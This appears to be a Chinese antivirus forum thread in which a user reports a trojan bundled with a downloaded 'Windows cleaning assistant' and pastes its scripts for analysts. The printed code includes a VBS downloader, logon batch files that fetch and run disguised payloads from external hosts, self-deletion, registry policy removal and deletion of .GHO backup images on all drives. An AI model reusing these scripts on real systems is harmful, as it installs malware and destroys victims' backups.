瑞星卡卡安全论坛

 附件: 您所在的用户组无法下载或查看附件
 附件: 您所在的用户组无法下载或查看附件
是在http://jsnetcom.onlinedown.com/down/zrswp3_newhua_x8z.zip下载的Windows清理助手,希望瑞星去测试下,为什么杀不了这么恶意的代码
3.bat
@Echo Off
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
regedit.exe/s %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\winrp.reg
sys.bat
@Echo Off
Del %0
ssys.bat
@Echo Off
Del /f /s /q /a %SystemRoot%\Web\svchst.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchst.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.vbs
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost.exe
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.bat
:Next
Del /f /s /q /a %SystemRoot%\Web\svchost1.exe
:Next
ping  www.google.com  &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs  http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201001.swf    %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201002.swf    %SystemRoot%\Web\svchst.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201003.swf    %SystemRoot%\Web\svchst.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchst.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201004.swf    %SystemRoot%\Web\svchost.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201005.swf    %SystemRoot%\Web\svchost.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201006.swf    %SystemRoot%\Web\svchost.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201007.swf    %SystemRoot%\Web\svchost1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://liangci.gh60.com/images/uploadfile/uploadfile/swf/2010-09/20100000201008.swf    %SystemRoot%\Web\svchost1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\Web\svchost.vbs
Exit
:End
ping    www.google.com    &&Goto ok
Goto End
yici.bat
@Echo Off
md "%SystemRoot%\ehome"
ping    www.google.com    &&Goto ok   
Goto End
:ok
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011617.swf    %SystemRoot%\ehome\cacls.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011618.swf    %SystemRoot%\ehome\cacls.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011619.swf    %SystemRoot%\ehome\cacls.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011620.swf    %SystemRoot%\ehome\cacls1.exe
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011621.swf    %SystemRoot%\ehome\cacls1.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\donw.vbs    http://yici.gh60.com/images/uploadfile/uploadfile/swf45/2008-3/200899172011622.swf    %SystemRoot%\ehome\ca.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
start %SystemRoot%\ehome\cacls.vbs
Del %0
:End
ping    www.google.com    &&Goto ok
Goto End
notepa.bat
@Echo Off
Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
:Next
%SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
:Next
rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
:Next
Del /f/s/q d:\*.GHO
Del /f/s/q e:\*.GHO
Del /f/s/q f:\*.GHO
Del /f/s/q g:\*.GHO
Del /f/s/q h:\*.GHO
Del /f/s/q i:\*.GHO
Del /f/s/q j:\*.GHO
Del /f/s/q k:\*.GHO
Del /f/s/q %SystemRoot%\Logon\sys.bat
Del /f/s/q %SystemRoot%\Logon\shijian.vbs
Del /f/s/q %SystemRoot%\Logon\index.vbs
rd 2 /s/q %SystemRoot%\GroupPolicy
Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
dEL %0

donw.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
wscript.sleep 1
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
wscript.sleep 1
sGet.SaveToFile iLocal,1

shijian.vbs
Dim Wsh
set ws=wscript.createobject("wscript.shell")
Wscript.Sleep 1000

winrp.reg
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy]

 附件: 您所在的用户组无法下载或查看附件

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

附件: ehome.rar

发现被暗算是在进程发现cmd.exe和conime.exe同时存在,我又没做什么操作,还全盘杀毒也没发现情况,就这样被轻松安装木马,真不甘心,望有关技术人员检测下他下载安装了什么,还有其他驻留了什么,我是不是发错地方了

???没技术人员吗?

楼主，请不要再编辑1楼的帖子，你的链接别人如果误点，会中毒的……:kaka6:

1楼红色链接地址下载的文件个头实在太大（20多M），有兴趣的高手不妨下载玩玩……:default71:

该用户帖子内容已被屏蔽